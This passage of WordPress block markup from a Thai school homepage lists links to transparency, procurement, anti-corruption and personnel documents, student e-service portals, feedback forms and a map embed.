data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม  No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 